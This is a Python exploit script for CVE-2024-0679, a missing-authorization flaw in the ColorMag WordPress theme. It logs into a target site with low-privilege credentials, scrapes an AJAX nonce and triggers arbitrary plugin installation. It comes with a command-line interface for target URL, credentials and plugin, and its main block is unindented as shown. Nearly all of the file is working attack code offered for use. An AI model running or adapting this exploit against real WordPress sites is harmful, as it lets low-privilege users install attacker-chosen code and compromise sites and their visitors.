#!/usr/bin/env python3
import argparse
import getpass
import os
import re

import requests
#
# Exploit script by @RandomRobbieBF
#
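# Optional upstream proxy for traffic inspection (e.g. "http://127.0.0.1:8080" for
# Burp). Only a non-empty value is exported; with the default empty string the
# environment's own HTTP_PROXY/HTTPS_PROXY are left untouched instead of being
# silently blanked for the rest of the process.
http_proxy = ""
if http_proxy:
    os.environ['HTTP_PROXY'] = http_proxy
    os.environ['HTTPS_PROXY'] = http_proxy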
# TLS verification is switched off on the session used below, which makes urllib3
# emit an InsecureRequestWarning on every request; silence that category globally
# so the progress output stays readable. (Verification itself stays disabled.)
from requests.packages.urllib3.exceptions import InsecureRequestWarning

_urllib3 = requests.packages.urllib3
_urllib3.disable_warnings(InsecureRequestWarning)
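# Matches the nonce fragment embedded in the page the login redirects to. The anchor
# on 'Processing...' is presumably a script-localization string of the theme's admin
# page; if that string changes, extraction fails with "No Nonce Found".
_NONCE_RE = re.compile(r'Processing...","nonce":"([^"]+)"')


def _login(session, siteurl, wp_user, wp_pass, timeout):
    """POST the wp-login.php form and return the final response of the redirect chain.

    The script treats a cookie whose name contains ``wordpress_logged_in`` landing in
    the session jar as proof of authentication; nothing else (status code, body) is
    inspected.

    Raises:
        SystemExit: (status 1) when no such cookie was set.
    """
    login_response = session.post(
        siteurl + '/wp-login.php',
        data={
            'log': wp_user,
            'pwd': wp_pass,
            'rememberme': 'forever',
            'wp-submit': 'Log+In',
        },
        timeout=timeout,
    )
    if not any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        # Non-zero exit so wrappers/CI notice the failure (a bare exit() returns 0).
        raise SystemExit("Failed to log in.")
    print("Logged in successfully.")
    return login_response


def _extract_nonce(html):
    """Return the AJAX nonce found in *html*, or None when the marker is absent."""
    match = _NONCE_RE.search(html)
    return match.group(1) if match else None


def _install_plugin(session, siteurl, nonce, slug, plugin, timeout):
    """Send ColorMag's ``install_plugin`` admin-ajax action and return the raw response.

    Only installation is requested here; nothing in this script sends an activation
    action, despite the public function's name.
    """
    params_post = {"action": "install_plugin", "security": nonce, "plugin": plugin, "slug": slug}
    headers = {
        "Origin": siteurl,
        "Accept": "*/*",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Referer": siteurl + "/wp-admin/themes.php?page=colormag&tab=products",
        "Connection": "close",
        "Accept-Language": "en-US,en;q=0.5",
        # Do not advertise "br": urllib3 only decodes brotli when the optional brotli
        # package is installed, so a br-encoded reply would be printed as garbage.
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    }
    return session.post(
        siteurl + "/wp-admin/admin-ajax.php",
        data=params_post,
        headers=headers,
        timeout=timeout,
    )


def login_and_activate_plugin(siteurl, wp_user, wp_pass, slug, plugin, *, timeout=30):
    """Log in as *wp_user* and trigger ColorMag's ``install_plugin`` AJAX action.

    Args:
        siteurl: Base URL of the target; a trailing slash is tolerated.
        wp_user, wp_pass: Credentials of an existing account (the advisory text in
            this file says subscriber-level is sufficient).
        slug: Passed through verbatim as the ``slug`` form field.
        plugin: Passed through verbatim as the ``plugin`` form field.
            NOTE(review): the CLI help suggests a pre-encoded ``%2F``; requests
            form-encodes the value once more, so the server receives ``%252F``
            unless it url-decodes the field — confirm against a live target.
        timeout: Seconds to wait per HTTP round-trip; requests has no default timeout,
            so without this a stalled target blocks the script forever.

    Returns:
        The admin-ajax response, so callers can inspect status/body themselves.
        Progress is also printed to stdout.

    Raises:
        SystemExit: when login fails or the nonce cannot be found.
    """
    siteurl = siteurl.rstrip('/')
    session = requests.Session()
    # Verification is deliberately off for self-signed lab targets; note this also
    # lets any on-path party read the credentials and cookies sent below.
    session.verify = False

    login_response = _login(session, siteurl, wp_user, wp_pass, timeout)

    print('Getting Nonce!')
    nonce_value = _extract_nonce(login_response.text)
    if nonce_value is None:
        raise SystemExit("No Nonce Found")
    print(nonce_value)

    print('Installing Plugin!')
    install_response = _install_plugin(session, siteurl, nonce_value, slug, plugin, timeout)
    print("HTTP STATUS: " + str(install_response.status_code) + " Response: " + install_response.text)
    return install_response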
# Add the vulnerability description as a comment
DESCRIPTION = """
ColorMag <= 3.1.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
Description
CVE-2024-0679 - The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.
"""
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument('--url', required=True, help='URL of the WordPress site')
parser.add_argument('--username', required=True, help='WordPress username')
parser.add_argument('--password', required=True, help='WordPress password')
parser.add_argument('--slug', required=True, help='WordPress Plugin Slug')
parser.add_argument('--plugin', required=True, help='WordPress Plugin PHP file i.e learning-management-system%2Flms.php')
args = parser.parse_args()
login_and_activate_plugin(args.url, args.username, args.password,args.slug,args.plugin)